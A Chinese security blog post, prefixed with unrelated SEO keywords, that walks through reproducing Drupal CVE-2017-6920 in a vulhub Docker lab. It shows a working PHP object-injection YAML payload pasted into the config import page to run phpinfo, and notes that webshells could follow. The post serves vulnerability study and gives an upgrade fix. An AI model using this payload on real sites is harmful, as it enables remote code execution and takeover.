网站制作的公司哪家效果好,淄博免费建站,九江专业网站建设,wordpress android客户端#x1f36c; 博主介绍 #x1f468;#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 _PowerShell #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 #x1f389;点赞➕评论➕收藏 养成习… 博主介绍 博主介绍大家好我是 _PowerShell 很高兴认识大家~ ✨主攻领域【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 文章目录 博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2017-6920环境2、启动CVE-2017-6920环境3、查看CVE-2017-6920环境4、安装yaml拓展5、访问CVE-2017-6920环境6、查看CVE-2017-6920漏洞提示信息7、关闭CVE-2017-6920环境五、漏洞复现1、访问漏洞点2、导入POC3、复现成功六、漏洞修复七、相关资源一、漏洞编号
CVE-2017-6920二、影响范围
Drupal 8.3.4三、漏洞描述 Drupal是使用PHP语言编写的开源内容管理框架CMF它由内容管理系统CMS和PHP开发框架Framework共同构成在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖是基于PHP语言最著名的WEB应用程序。CVE-2017- 6920 是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞影响8.x的Drupal Core。 四、环境搭建
1、进入CVE-2017-6920环境
cd vulhub/confluence/CVE-2017-69202、启动CVE-2017-6920环境
docker-compose up -d3、查看CVE-2017-6920环境
docker-compose ps4、安装yaml拓展 1.查看容器信息 docker ps2.进入容器 docker exec -it 容器ID /bin/bash3.换镜像源 默认带vim编辑器所以用cat换源可以换成自己喜欢的源 cat sources.list EOF
deb http://mirrors.163.com/debian/ jessie main non-free contrib
deb http://mirrors.163.com/debian/ jessie-updates main non-free contrib
deb http://mirrors.163.com/debian/ jessie-backports main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib
deb-src http://mirrors.163.com/debian/ jessie-backports main non-free contrib
deb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib
deb-src http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib
EOF4.安装依赖 apt update apt-get -y install gcc make autoconf libc-dev pkg-config apt-get -y install libyaml-dev安装yaml扩展 pecl install yamlpecl install yaml docker-php-ext-enable yaml.so 6.启用 yaml.decode_php echo yaml.decode_php 1 1/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini7.退出容器 exit8.重启容器 docker restart 容器ID5、访问CVE-2017-6920环境 环境启动后访问http://your-ip:8080,将会看到drupal的安装页面一路默认配置下一步安装。 因为没有mysql环境所以安装的时候可以选择sqlite数据库。 中文装不了就装英文 一直默认安装就行然后数据库配置这一块儿选择SQLite 然后就会自动安装srupal 设置站点名称登陆账号密码啥的 站点名称我就设置为powershell 邮箱随便设置我设置了123qq.com 账号我就设置为root密码我就设置为123456了 更新配置中 自动登录进入了网站 6、查看CVE-2017-6920漏洞提示信息
cat README.md7、关闭CVE-2017-6920环境 复现完记得关闭环境 docker-compose down五、漏洞复现
1、访问漏洞点 登录管理员账户访问 http://your-ip:8080/admin/config/development/configuration/single/import界面如下 2、导入POC 如下图所示配置类型选择 简单配置配置名称任意填写文本处中填写PoC如下: !php/objectO:24:\GuzzleHttp\\Psr7\\FnStream\:2:{s:33:\\0GuzzleHttp\\Psr7\\FnStream\0methods\;a:1:{s:5:\close\;s:7:\phpinfo\;}s:9:\_fn_close\;s:7:\phpinfo\;}点击导入漏洞触发 3、复现成功 回显出phpinfo信息 既然能执行命令那我们也可以写入webshell 六、漏洞修复 升级Drupal为最新版本 七、相关资源 1、docker 搭建 vulhub 靶场环境 2、[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本含漏洞复现文章连接 3、[ vulhub漏洞复现篇 ] vulhub 漏洞集合含漏洞复现文章连接
